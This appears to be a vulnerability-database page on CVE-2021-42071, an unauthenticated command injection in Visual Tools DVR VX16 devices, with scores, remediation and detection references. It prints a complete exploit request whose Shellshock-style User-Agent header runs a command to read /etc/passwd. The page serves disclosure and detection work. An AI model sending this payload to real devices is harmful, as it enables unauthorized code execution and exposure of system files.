🔙 목록으로 돌아가기

CVE-2021-42071: Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection

TitleVisual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection
Authorgy741
SeverityCritical
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the affected system.
RemediationApply the latest security patch or update provided by the vendor to fix the command injection vulnerability in the Visual Tools DVR VX16 4.2.28.0 device.
CVSS Score9.8
EPSS Score0.91339
CVE IDCVE-2021-42071
CWE IDCWE-78
Tags cve2021 cve edb visualtools rce oast injection visual-tools vkev vuln

🔍 Vulnerability Description

Visual Tools DVR VX16 4.2.28.0 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.

🌐 HTTP Request

GET /cgi-bin/slogin/login.py HTTP/1.1
Host: www.victim.com
User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd
Connection: close
Accept: */*
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-42071.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-42071.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A